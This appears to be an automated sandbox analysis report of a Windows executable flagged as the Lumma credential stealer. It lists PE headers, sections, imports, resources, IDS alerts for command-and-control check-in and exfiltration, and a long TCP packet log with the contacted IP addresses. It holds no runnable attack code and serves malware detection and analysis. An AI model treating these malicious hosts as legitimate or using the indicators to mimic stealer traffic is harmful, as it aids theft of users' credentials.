                                                                          mov dword ptr [004588FCh], eax
                                                                          mov eax, dword ptr [ebp+04h]
                                                                          mov dword ptr [00458900h], eax
                                                                          lea eax, dword ptr [ebp+08h]
                                                                          mov dword ptr [0045890Ch], eax
                                                                          mov eax, dword ptr [ebp-00000320h]
                                                                          mov dword ptr [00458848h], 00010001h
                                                                          mov eax, dword ptr [00458900h]
                                                                          mov dword ptr [004587FCh], eax
                                                                          mov dword ptr [004587F0h], C0000409h
                                                                          mov dword ptr [004587F4h], 00000001h
                                                                          mov eax, dword ptr [00457004h]
                                                                          mov dword ptr [ebp-00000328h], eax
                                                                          mov eax, dword ptr [00457008h]
                                                                          mov dword ptr [ebp-00000324h], eax
                                                                          call dword ptr [0000009Ch]
                                                                          Programming Language:
                                                                          • [C++] VS2008 build 21022
                                                                          • [ASM] VS2008 build 21022
                                                                          • [ C ] VS2008 build 21022
                                                                          • [IMP] VS2005 build 50727
                                                                          • [RES] VS2008 build 21022
                                                                          • [LNK] VS2008 build 21022
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x55a1c0x3c.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000x200e8.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x555a00x40.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x540000x188.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x522ab0x524006ed04718dd4c06928fcfc0f45551e7fdFalse0.8351004464285714data7.538235884567587IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x540000x23000x2400bdb6c06d051085777b57869dbd3429aaFalse0.3639322916666667data5.469047202634087IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0x570000x67f7c0x1800e024607510d887441ce0b605120bffb7False0.3365885416666667data3.354982143989316IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .yabatop0xbf0000x53e50x4800f9debe3f07be68533bf0295e3d2ba68aFalse0.002224392361111111data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .kip0xc50000x15a0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0xc60000x200e80x20200e99b6f574be761854a34d3e81856c5c9False0.39450845087548636data4.852392266407537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_CURSOR0xdd6000x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                                          RT_CURSOR0xdd7480x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                          RT_CURSOR0xdd8780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                          RT_CURSOR0xdfe480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                                          RT_ICON0xc6b700xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.8296908315565032
                                                                          RT_ICON0xc7a180x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.8411552346570397
                                                                          RT_ICON0xc82c00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.8145161290322581
                                                                          RT_ICON0xc89880x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.7485549132947977
                                                                          RT_ICON0xc8ef00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.803941908713693
                                                                          RT_ICON0xcb4980x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.844672131147541
                                                                          RT_ICON0xcbe200x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.8563829787234043
                                                                          RT_ICON0xcc2f00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.3344882729211087
                                                                          RT_ICON0xcd1980x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.39666064981949456
                                                                          RT_ICON0xcda400x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.3888248847926267
                                                                          RT_ICON0xce1080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.3959537572254335
                                                                          RT_ICON0xce6700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.22136929460580912
                                                                          RT_ICON0xd0c180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.24765478424015008
                                                                          RT_ICON0xd1cc00x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.28114754098360656
                                                                          RT_ICON0xd26480x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.3120567375886525
                                                                          RT_ICON0xd2b280xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3307569296375267
                                                                          RT_ICON0xd39d00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.4611913357400722
                                                                          RT_ICON0xd42780x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.5282258064516129
                                                                          RT_ICON0xd49400x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                                          RT_ICON0xd4ea80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.3025328330206379
                                                                          RT_ICON0xd5f500x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.3008196721311475
                                                                          RT_ICON0xd68d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3528368794326241
                                                                          RT_ICON0xd6da80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.28171641791044777
                                                                          RT_ICON0xd7c500x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.36597472924187724
                                                                          RT_ICON0xd84f80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.3738479262672811
                                                                          RT_ICON0xd8bc00x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.36921965317919075
                                                                          RT_ICON0xd91280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.2598547717842324
                                                                          RT_ICON0xdb6d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.27790806754221387
                                                                          RT_ICON0xdc7780x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.28524590163934427
                                                                          RT_ICON0xdd1000x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.32358156028368795
                                                                          RT_STRING0xe0eb80x4c4data0.44344262295081965
                                                                          RT_STRING0xe13800x15edata0.5114285714285715
                                                                          RT_STRING0xe14e00x7d4data0.4241516966067864
                                                                          RT_STRING0xe1cb80x7b0data0.42327235772357724
                                                                          RT_STRING0xe24680x5f8data0.4443717277486911
                                                                          RT_STRING0xe2a600x6b6data0.43364377182770664
                                                                          RT_STRING0xe31180x66adata0.438489646772229
                                                                          RT_STRING0xe37880x6fadata0.4316909294512878
                                                                          RT_STRING0xe3e880x754data0.4253731343283582
                                                                          RT_STRING0xe45e00x422data0.4735349716446125
                                                                          RT_STRING0xe4a080x668data0.4329268292682927
                                                                          RT_STRING0xe50700x80edata0.4146459747817653
                                                                          RT_STRING0xe58800x668data0.4274390243902439
                                                                          RT_STRING0xe5ee80x1fedata0.49411764705882355
                                                                          RT_ACCELERATOR0xdd5e00x20data1.15625
                                                                          RT_GROUP_CURSOR0xdd7300x14data1.15
                                                                          RT_GROUP_CURSOR0xdfe200x22data1.0588235294117647
                                                                          RT_GROUP_CURSOR0xe0cf00x14data1.25
                                                                          RT_GROUP_ICON0xcc2880x68data0.7115384615384616
                                                                          RT_GROUP_ICON0xdd5680x76data0.6779661016949152
                                                                          RT_GROUP_ICON0xd2ab00x76data0.6779661016949152
                                                                          RT_GROUP_ICON0xd6d400x68data0.7211538461538461
                                                                          RT_VERSION0xe0d080x1b0data0.5833333333333334
                                                                          DLLImport
                                                                          KERNEL32.dllGetThreadContext, GetNumaNodeProcessorMask, SetDefaultCommConfigA, DebugActiveProcessStop, CreateProcessW, InterlockedIncrement, GetEnvironmentStringsW, CancelWaitableTimer, InterlockedCompareExchange, GetComputerNameW, GetTimeFormatA, GetModuleHandleW, GetCurrentThread, GetDateFormatA, SetProcessPriorityBoost, GetVolumePathNameW, LoadLibraryW, GetConsoleAliasW, GetStartupInfoW, GetShortPathNameA, GetStartupInfoA, SetLastError, GetProcAddress, SearchPathA, GetAtomNameA, UnhandledExceptionFilter, LocalAlloc, DeleteTimerQueue, AddAtomA, FindAtomA, FoldStringA, OpenFileMappingW, FindFirstVolumeW, GetModuleHandleA, HeapAlloc, GetCommandLineA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, HeapCreate, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetLastError, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetStdHandle, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, CreateFileA, CloseHandle, RaiseException
                                                                          USER32.dllGetProcessDefaultLayout
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2025-01-09T08:33:34.908696+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649715104.21.56.70443TCP
                                                                          2025-01-09T08:33:35.800260+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649726176.113.115.1980TCP
                                                                          2025-01-09T08:33:38.662091+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649747104.21.64.1443TCP
                                                                          2025-01-09T08:33:39.124512+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649747104.21.64.1443TCP
                                                                          2025-01-09T08:33:39.124512+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649747104.21.64.1443TCP
                                                                          2025-01-09T08:33:39.613649+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649753104.21.64.1443TCP
                                                                          2025-01-09T08:33:40.080394+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649753104.21.64.1443TCP
                                                                          2025-01-09T08:33:40.080394+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649753104.21.64.1443TCP
                                                                          2025-01-09T08:33:41.386982+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649764104.21.64.1443TCP
                                                                          2025-01-09T08:33:41.948675+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649764104.21.64.1443TCP
                                                                          2025-01-09T08:33:42.559005+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649771104.21.64.1443TCP
                                                                          2025-01-09T08:33:44.185867+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649782104.21.64.1443TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Jan 9, 2025 08:33:33.948128939 CET49715443192.168.2.6104.21.56.70
                                                                          Jan 9, 2025 08:33:33.948163986 CET44349715104.21.56.70192.168.2.6
                                                                          Jan 9, 2025 08:33:33.948244095 CET49715443192.168.2.6104.21.56.70
                                                                          Jan 9, 2025 08:33:33.982306004 CET49715443192.168.2.6104.21.56.70
                                                                          Jan 9, 2025 08:33:33.982322931 CET44349715104.21.56.70192.168.2.6
                                                                          Jan 9, 2025 08:33:34.460011005 CET44349715104.21.56.70192.168.2.6
                                                                          Jan 9, 2025 08:33:34.460120916 CET49715443192.168.2.6104.21.56.70
                                                                          Jan 9, 2025 08:33:34.530270100 CET49715443192.168.2.6104.21.56.70
                                                                          Jan 9, 2025 08:33:34.530292034 CET44349715104.21.56.70192.168.2.6
                                                                          Jan 9, 2025 08:33:34.530647993 CET44349715104.21.56.70192.168.2.6
                                                                          Jan 9, 2025 08:33:34.530711889 CET49715443192.168.2.6104.21.56.70
                                                                          Jan 9, 2025 08:33:34.535456896 CET49715443192.168.2.6104.21.56.70
                                                                          Jan 9, 2025 08:33:34.583333969 CET44349715104.21.56.70192.168.2.6
                                                                          Jan 9, 2025 08:33:34.908714056 CET44349715104.21.56.70192.168.2.6
                                                                          Jan 9, 2025 08:33:34.908803940 CET44349715104.21.56.70192.168.2.6
                                                                          Jan 9, 2025 08:33:34.908832073 CET49715443192.168.2.6104.21.56.70
                                                                          Jan 9, 2025 08:33:34.908859015 CET49715443192.168.2.6104.21.56.70
                                                                          Jan 9, 2025 08:33:34.911423922 CET49715443192.168.2.6104.21.56.70
                                                                          Jan 9, 2025 08:33:34.911449909 CET44349715104.21.56.70192.168.2.6
                                                                          Jan 9, 2025 08:33:34.911464930 CET49715443192.168.2.6104.21.56.70
                                                                          Jan 9, 2025 08:33:34.911504984 CET49715443192.168.2.6104.21.56.70
                                                                          Jan 9, 2025 08:33:35.093379021 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.098247051 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.101921082 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.106142998 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.110907078 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.800184011 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.800211906 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.800226927 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.800237894 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.800259113 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.800260067 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.800277948 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.800292015 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.800302982 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.800313950 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.800314903 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.800328016 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.800369024 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.805128098 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.805145025 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.805202007 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.805370092 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.805526018 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.921931028 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.921947002 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.922010899 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.922029972 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.922040939 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.922077894 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.922106981 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.922144890 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.922197104 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.922245026 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.922249079 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.922261000 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.922333002 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.922593117 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.922636986 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.922646046 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.922646999 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.922669888 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.922696114 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.923021078 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.923032045 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.923044920 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.923067093 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.923077106 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.923108101 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.923580885 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.923626900 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.923638105 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.923644066 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.923667908 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.923693895 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.923789978 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.923803091 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.923814058 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.923835039 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.923873901 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.924557924 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.924588919 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.924601078 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.924650908 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.924693108 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.926805973 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.926827908 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.926860094 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.926883936 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.927016973 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.927028894 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:35.927057981 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:35.927084923 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.044339895 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044358015 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044383049 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044399977 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044414043 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044419050 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.044476032 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.044496059 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044518948 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044532061 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044536114 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.044567108 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.044568062 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044608116 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.044622898 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044667006 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.044779062 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044816971 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.044836044 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044848919 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044873953 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.044893026 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.044929028 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044941902 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044953108 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044965982 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.044971943 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.045003891 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.045070887 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.045083046 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.045119047 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.045423985 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.045444965 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.045456886 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.045470953 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.045491934 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.045511007 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.045557976 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.045569897 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.045581102 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.045593977 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.045595884 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.045613050 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.045641899 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.045681000 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.045731068 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.045751095 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.045764923 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.045774937 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.045799017 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.045829058 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.046158075 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046196938 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.046226025 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046237946 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046252012 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046262980 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.046284914 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.046318054 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046330929 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046344042 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046354055 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.046384096 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.046622038 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046643972 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046655893 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046670914 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.046686888 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.046700954 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046744108 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.046773911 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046808004 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046811104 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.046823025 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046848059 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.046870947 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.046938896 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046951056 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046964884 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046976089 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.046977043 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.046993017 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.047010899 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.053482056 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.053500891 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.053514957 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.053525925 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.053555012 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.053584099 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.166551113 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.166570902 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.166613102 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.166634083 CET4972680192.168.2.6176.113.115.19
                                                                          Jan 9, 2025 08:33:36.166729927 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.166744947 CET8049726176.113.115.19192.168.2.6
                                                                          Jan 9, 2025 08:33:36.166758060 CET8049726176.113.115.19192.168.2.6
